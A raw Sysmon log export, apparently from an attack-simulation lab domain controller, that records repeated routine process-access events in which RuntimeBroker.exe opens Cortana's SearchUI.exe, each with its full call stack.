12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.664{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
